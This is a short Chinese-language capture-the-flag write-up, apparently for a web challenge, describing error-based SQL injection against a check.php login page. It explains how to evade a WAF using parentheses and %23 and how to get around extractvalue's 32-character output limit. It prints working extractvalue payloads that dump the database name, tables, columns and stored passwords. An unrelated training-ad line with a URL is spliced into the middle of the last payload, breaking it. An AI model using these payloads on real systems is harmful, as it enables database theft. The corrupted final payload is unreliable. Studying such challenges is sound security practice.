用burp抓包后发现这并不是POST类型,而是在check.php页面的GET型。
对用户名字段和密码字段进行fuzz,检查是否有过滤,发现存在waf。这里用得burp的intruder,不过要设置一定的请求延迟,否则容易返回429。
由于单引号引起了报错(会有报错信息返回),or和#未经过滤,尝试报错注入。空格也会触发waf,于是使用括号进行多层嵌套绕过对括号的过滤。由于返回的字符串长度有限,因此使用left和right函数分别从左右截断获取完整的信息。或仅使用right函数,控制其截取长度的参数不断增大,可以自右至左获取查询结果的全貌。
payload:
爆库名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,database(),0x7e)))%23爆表名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e)))%23爆列名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e)))%23爆数据/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(rig 陕西干部培训 http://sx.ganxun.cn/ ht(password,30))from(geek.H4rDsq1)),0x7e)))%23
后来看到原来是报错函数extractvalue限制每次查询出的字符串长度最大为32,又尝试了updatexml函数,与extractvalue函数一致。